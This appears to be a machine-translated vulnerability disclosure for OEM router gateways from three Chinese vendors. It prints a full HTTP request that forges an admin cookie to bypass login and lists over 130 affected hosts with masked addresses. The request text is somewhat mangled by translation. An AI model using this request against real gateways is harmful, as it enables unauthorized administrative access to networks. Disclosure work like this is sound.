A Router OEM Gateway product has a design defect and can forge any Cookie for unauthorized access (involving products of three companies)
130 + cases
Products (models) involving three companies ):
Lim-GW31200
Lim-GW1200
Based on the case, the above products belong to Shandong bit Electronics Industry Co., Ltd.
CGW3000T
CGW3000
CGW2000
CGW1200
Gateway
CGW500
CA2025C
TA2020C
Based on the case, the above products belong to Shanghai Chuang Communication Technology Co., Ltd.
VSS-WG-100
VSS-WG-120
Based on the case, the above products are copyrighted by Shanghai qibang Information Technology Co., Ltd.
With design defects, You can forge any cookie to log on:
GET/cgi-bin/snmpManager. cgi? Cgimodule = dev_basic HTTP/1.1 Host: Address Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp ,*/*; q = 0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 33.0) Gecko/20120101 Firefox/33.0 Referer: http: // address/cgi-bin/snmpManager. cgiAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8 Cookie: name = admin domain = language = 0 path = \
Case:
**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:8090/**.**.**.**:8081/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8080/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8080/**.**.**.**/**.**.**.**/**.**.**.**:88/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**:8090/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**:88/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**:8090/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**2:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:8090/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:88/**.**.**.**:8090/**.**.**.**:88/**.**.**.**:88/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:88/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8081/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/**.**.**.**:8090/
Solution:
Contact the manufacturer.